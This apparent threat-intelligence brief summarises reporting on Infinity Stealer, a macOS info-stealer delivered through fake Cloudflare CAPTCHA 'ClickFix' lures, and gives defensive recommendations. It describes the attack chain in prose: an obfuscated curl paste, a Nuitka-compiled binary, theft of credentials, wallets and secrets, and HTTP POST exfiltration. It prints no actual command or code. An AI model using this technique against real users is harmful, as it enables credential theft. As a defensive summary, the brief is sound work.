HomeIntelligenceBrief
🔓 BREACH BRIEF🟠 High🔍 ThreatIntel

Infinity Stealer Malware Harvests macOS Credentials via ClickFix Fake CAPTCHA

Infinity Stealer is a macOS‑only info‑stealer that tricks users with a fake Cloudflare CAPTCHA, then downloads a native binary compiled with Nuitka to steal browser passwords, Keychain entries, crypto wallets and developer secrets. The campaign demonstrates advanced evasion and poses a high‑risk third‑party threat to organizations with macOS endpoints.

🛡️ LiveThreat™ Intelligence · 📅 March 28, 2026· 📰 bleepingcomputer.com
🟠
Severity
High
🔍
Type
ThreatIntel
🎯
Confidence
High
🏢
Affected
5 sector(s)
Actions
4 recommended
📰
Source
bleepingcomputer.com

Infinity Stealer Malware Harvests macOS Credentials via ClickFix Fake CAPTCHA

What Happened — A new macOS‑only info‑stealer dubbed Infinity Stealer uses a “ClickFix” lure that mimics Cloudflare’s CAPTCHA. Victims are tricked into pasting a base‑64‑obfuscated curl command into Terminal, which downloads a native macOS binary compiled with Nuitka and proceeds to harvest browser credentials, Keychain entries, crypto wallets and plaintext secrets before exfiltrating them via HTTP POST.

Why It Matters for TPRM

  • macOS endpoints are increasingly common in enterprise environments; a successful compromise can expose privileged credentials and crypto assets.
  • The Nuitka‑compiled payload evades many traditional static‑analysis tools, reducing the effectiveness of existing endpoint detection controls.
  • Credential theft from browsers and Keychain can cascade into supply‑chain risk if compromised accounts have privileged access to third‑party services.

Who Is Affected

  • Organizations that allow macOS laptops or workstations (technology SaaS, professional services, education, media, design, and any firm with a BYOD policy).
  • Vendors that provide macOS‑focused endpoint security or device‑management solutions.

Recommended Actions

  • Review all macOS device policies; enforce strict “no‑paste‑into‑Terminal” rules and user awareness training.
  • Verify that endpoint protection solutions can detect native binaries generated by Nuitka or flag suspicious ClickFix‑style URLs.
  • Harden browser and Keychain access: enable MFA, enforce least‑privilege for stored credentials, and consider credential vaulting.
  • Monitor outbound HTTP traffic for unusual POSTs to unknown C2 domains and for Telegram API calls.

Technical Notes

  • Attack vector: Phishing‑style ClickFix CAPTCHA that delivers a malicious curl command.
  • Payload: Python 3.11 script compiled to a native Mach‑O binary with Nuitka, making static analysis difficult.
  • Data stolen: Chromium‑based and Firefox browser passwords, macOS Keychain entries, cryptocurrency wallet files, .env developer secrets, screenshots.
  • Exfiltration: HTTP POST to attacker‑controlled server; Telegram notification sent on completion.
  • No public CVE associated; the technique is novel for macOS.

Source: BleepingComputer

📰 Original Source
https://www.bleepingcomputer.com/news/security/new-infinity-stealer-malware-grabs-macos-data-via-clickfix-lures/

This LiveThreat Intelligence Brief is an independent analysis. Read the original reporting at the link above.

🛡️

Monitor Your Vendor Risk with LiveThreat™

Get automated breach alerts, security scorecards, and intelligence briefs when your vendors are compromised.

Start Free Trial → Learn About Scorecards
← All Intelligence Briefs Breach Watch Feed →